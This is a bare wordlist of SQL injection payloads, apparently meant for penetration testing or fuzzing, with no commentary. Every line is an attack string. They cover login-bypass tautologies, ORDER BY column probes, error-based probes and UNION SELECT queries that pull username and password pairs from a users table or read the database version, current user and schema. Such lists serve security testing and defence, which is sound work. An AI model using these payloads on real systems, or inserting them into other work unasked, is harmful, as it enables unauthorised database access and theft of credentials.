' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 1=1#
" OR 1=1#
') OR ('1'='1
") OR ("1"="1
')) OR (('1'='1
")) OR (("1"="1
1' ORDER BY 1--+
1' UNION SELECT 1,2,3--+
1' UNION ALL SELECT NULL,NULL,CONCAT(username,0x3a,password) FROM users--
1 OR 1=CONVERT(int, @@version)
1' AND 1=0 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(75),CHAR(76),CHAR(77))--
1' AND ERROR_MESSAGE()--
1' AND 1=0 UNION ALL SELECT NULL, NULL, CONCAT(username,0x3a,password) FROM users--
1' AND 1=0 UNION ALL SELECT NULL, NULL, @@version--
1' AND 1=0 UNION ALL SELECT NULL, NULL, CURRENT_USER--
1' AND 1=0 UNION ALL SELECT NULL, NULL, USER()--
1' AND 1=0 UNION ALL SELECT NULL, NULL, DATABASE()--
1' AND 1=0 UNION ALL SELECT NULL, NULL, SCHEMA_NAME()--
1' AND 1=0 UNION ALL SELECT NULL, NULL, VERSION()--